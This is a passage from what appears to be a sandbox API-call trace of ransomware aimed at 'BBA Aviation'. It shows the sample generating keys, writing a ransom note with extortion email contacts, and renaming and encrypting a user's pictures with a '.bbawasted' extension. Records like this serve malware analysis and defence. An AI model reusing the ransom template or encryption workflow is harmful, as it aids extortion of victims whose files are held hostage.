(hObject=0x294) returned 1 [0227.220] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0227.221] CloseHandle (hObject=0x27c) returned 1 [0227.221] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0227.221] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a62c8) returned 1 [0227.222] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0227.222] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0227.222] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0227.222] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0227.222] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0227.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0227.233] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0227.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.233] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]cnqrbkdsLLfLVYrIQf/gD/+d2dRdZkegHl9nO66TYv9sf+gRJBDJ6ueYJBSmGT4s\r\n33MUt8xIOB1ZzD9EP2m9+tx7J3mUXlsu9g9/3QNA476+YfAW21mJFqEbK8r2lbOQ\r\n5zvcQK6s6vQ8YSHH8Avs07WcciFYq8dbXzUQe4qobHBF2VsbcHSRDl34eLDbpjg+\r\nhu+ZQB/wPyU9MC/N+KozTWKt4pj88aYUe1j1rj2/5iq8wF3/keyQg04LGjihe6t0\r\nJRDPyeYyWogG0J3K2MrNyi3sQvGN86ntiQYz4CEz2EXJAFLP3PbfWb/zTzDSBSSb\r\njXHfAf8wX7ssjJVpAiqp8eL+8UWGbq6j5en5xlyNNavlE9DuWWEX+uQF1N2s8964\r\nWIR9lTjNN++xV9Rdu+GfX0gv3Ln9AqQAyAyadEGU8ihqyBUZNmxVEkwc3CnVXZet\r\nOlZ2d+vk+KCNarxc0UBksi4jq1Cemhl5x+9nlcATHlisux0icCIimVZ5RkQWFnbi\r\nppJM1JvN6PJfcj1hYjR0l17JKvK8E/kdGxXdHi5UFMoyxzWGdxuxDB4m5hTEbxRK\r\nIsz/HHtVMBLfFAPlQLlhVwaaB9qId5Vt8w5uehwPsld5X4ZW0j/qBT29ENYzjmMr\r\nx/r6j2F1SXsQ5GOhVEuYVl63+WZ0PMhMH/Vbd29cyLV=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.234] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0227.234] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0227.234] SetEndOfFile (hFile=0x290) returned 1 [0227.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.237] CloseHandle (hObject=0x290) returned 1 [0227.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0227.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6af5e8 | out: hHeap=0x660000) returned 1 [0227.237] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6bd0) returned 1 [0227.238] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0227.238] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0227.238] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\PtCraExa_AVAeD ksM s.jpg") returned 53 [0227.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6c4b88 [0227.238] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.239] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a60a8) returned 1 [0227.239] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.239] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0227.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\PtCraExa_AVAeD ksM s.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\ptcraexa_avaed ksm s.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0227.578] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.579] SetEndOfFile (hFile=0x290) returned 1 [0227.579] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.580] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.580] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\PtCraExa_AVAeD ksM s.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ptcraexa_avaed ksm s.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\PtCraExa_AVAeD ksM s.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\ptcraexa_avaed ksm s.jpg.bbawasted")) returned 1 [0227.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\PtCraExa_AVAeD ksM s.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\ptcraexa_avaed ksm s.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0227.581] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0227.581] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x91f9 [0227.581] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91f9) returned 0x5f0000 [0227.581] CloseHandle (hObject=0x27c) returned 1 [0227.583] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0227.584] CloseHandle (hObject=0x294) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0227.584] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0227.585] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0227.585] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0227.585] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6d68) returned 1 [0227.585] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0227.585] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0227.597] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0227.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.597] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lHr/ftchj7VnU74qBR9HIVrG15TILYVyI8xbulTf4zTT1dtcBnErqxEKtlKi2vXg\r\naU1K8rSYhPtnFch7ZtpWJks1Zm5tXY/ynsmvtC8b8sLJGTZAbGvVh9vFv9ajTT3W\r\nIR9Sv7fPCzyLxJtS/HMEM54fP/n460eDWrY8RE/0rc4strIsZlaMg0NAnmp0b8Cv\r\nN6rvMNsIHoPGPGBOu3tn9w3TCpnDPtRx8Xpany3y9X2lLPH88txXT4zmusM9EyRA\r\n24B7H4/wc9aUADqUyPJbcsCQYuMniIpIwBmkW9rtVOXH4tXdjjIENU2M1jbIQ1wJ\r\nnVpnK3IvjCPzIw6YZPcz738OIeOys4SrnDeHWt1igZJR49qeutPBz3rBG/gMszPP\r\nabI4NBPsCuV0X5NoeI85yi/GmxPfwB4T1Gtdq9ablXHkXdp1heMX1J9oGKDN+Xpy\r\n0aeXj31ELZhhE/Te4HiAYytSt/27Ny4/YhN4rCiSqUMFkmN+FCnPIe2KDmTCyEpn\r\nq/LBMHIj4fwjNi6Js629O/IFmYWyKd01SuHx50pDKMcT41bbA8SulS4WQ2zWqVrH\r\nJSdfrwB+rDaWaKNsJ0/KV1nu1IgLpeArilli6HqWMywZjUDvrGUWN1SI/+los+rd\r\nSS0YxhU5wz4B00nybsb9HLKcGb9wlgN9+XF+QujsP+z=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.598] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0227.598] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0227.598] SetEndOfFile (hFile=0x290) returned 1 [0227.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.601] CloseHandle (hObject=0x290) returned 1 [0227.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0227.601] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7ab8 | out: hHeap=0x660000) returned 1 [0227.601] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0227.602] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0227.602] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0227.602] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\t B t.bmp") returned 38 [0227.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x256) returned 0x6adb18 [0227.602] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.603] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a62c8) returned 1 [0227.603] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.603] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0227.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\t B t.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\t b t.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0227.604] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.605] SetEndOfFile (hFile=0x290) returned 1 [0227.605] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.606] lstrcpyW (in: lpString1=0x6adb64, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\t B t.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\t b t.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\t B t.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\t b t.bmp.bbawasted")) returned 1 [0227.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\t B t.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\t b t.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0227.607] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0227.607] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x15cf6 [0227.607] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15cf6) returned 0x5f0000 [0227.607] CloseHandle (hObject=0x294) returned 1 [0227.610] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0227.612] CloseHandle (hObject=0x27c) returned 1 [0227.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0227.612] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6b48) returned 1 [0227.612] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0227.612] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0227.613] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5e88) returned 1 [0227.613] CryptGenRandom (in: hProv=0x6a5e88, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0227.613] CryptReleaseContext (hProv=0x6a5e88, dwFlags=0x0) returned 1 [0227.939] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0227.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0227.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.942] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nZLmi8aG2LUeO+IfyvN2nGvodJtfMlX0F+yBWwWY1zbZ21wulZ3g+e2xzrRu6LWM\r\n0Cf6rtumzwTODrqjNPZN2czw+qzcjnekHMhzVt/AlWcI2onxeKoulfV7cr4Fu5Pl\r\n6CDxxrVBuk4EOJkV4wQy+EC02+U9QM83UMtaqy2SlTfEO4wPvO9eI8jojmDxOyxa\r\nkJLdomhxGRIHTBVmrC4Ptbp6CxVs7cQTtrrWdVedD7PvAJ6tTnHf+ICN91sLTucn\r\nrhMRayVID0ippttUtCKUb8zCtw7xNU8OVrBswrdYBFAv/L4VVZzot3/NMJW0AY4D\r\ndnL06yzUhCeJhU/21pcUJfkixd8iGH2NkBNP+CQODToj9Wz94s5+zGPONWQatX6s\r\nqOaTENdSqsKhb8DEllvwglxPIIRZOyH1Q1DB4BiRbxjKP6W5fm850/7WxCV7rSZ6\r\nqNclpiSbanYbbF4RpPWPBtJCIfoLm9UyZZTxXVf23F2xS9mpQXoXHyGlHQ2O0ufE\r\nWYbXFnHww99CeyZ3nA/RZYqbnlz2k/l4DOQggV61s5wx3Mp3oz7qFy//2Nf2hxXe\r\nEh/tM+nY578jdU+1owOtwEhaX0vNhuj/R9NGoCNqRcONfHuAInW4gjTUXMw7gxFc\r\ngc+zSP9u+t4wUb2dRp/2SU8/HkXd+QiqV8jbtSV+ke5=[end_key]\r\nKEEP IT\r\n") returned 984 [0227.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0227.942] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0227.943] SetEndOfFile (hFile=0x290) returned 1 [0227.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.946] CloseHandle (hObject=0x290) returned 1 [0227.946] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0227.947] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b3848 | out: hHeap=0x660000) returned 1 [0227.947] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6b48) returned 1 [0227.948] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0227.948] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0227.948] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\YRQeqQC3zUz.jpg") returned 44 [0227.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6adb18 [0227.948] lstrcpyW (in: lpString1=0x6adb70, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0227.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.948] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a68a0) returned 1 [0227.949] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0227.949] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0227.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\YRQeqQC3zUz.jpg.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\yrqeqqc3zuz.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0227.951] WriteFile (in: hFile=0x290, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0227.953] SetEndOfFile (hFile=0x290) returned 1 [0227.953] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.953] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0227.953] lstrcpyW (in: lpString1=0x6adb70, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0227.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\YRQeqQC3zUz.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\yrqeqqc3zuz.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\YRQeqQC3zUz.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\yrqeqqc3zuz.jpg.bbawasted")) returned 1 [0227.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\YRQeqQC3zUz.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\yrqeqqc3zuz.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0227.955] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0227.955] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0xac00 [0227.955] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xac00) returned 0x600000 [0227.955] CloseHandle (hObject=0x294) returned 1 [0227.957] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0227.958] CloseHandle (hObject=0x280) returned 1 [0227.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0227.958] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6790) returned 1 [0227.960] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0227.960] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0227.960] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0227.961] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0227.961] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0227.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0227.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0227.974] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 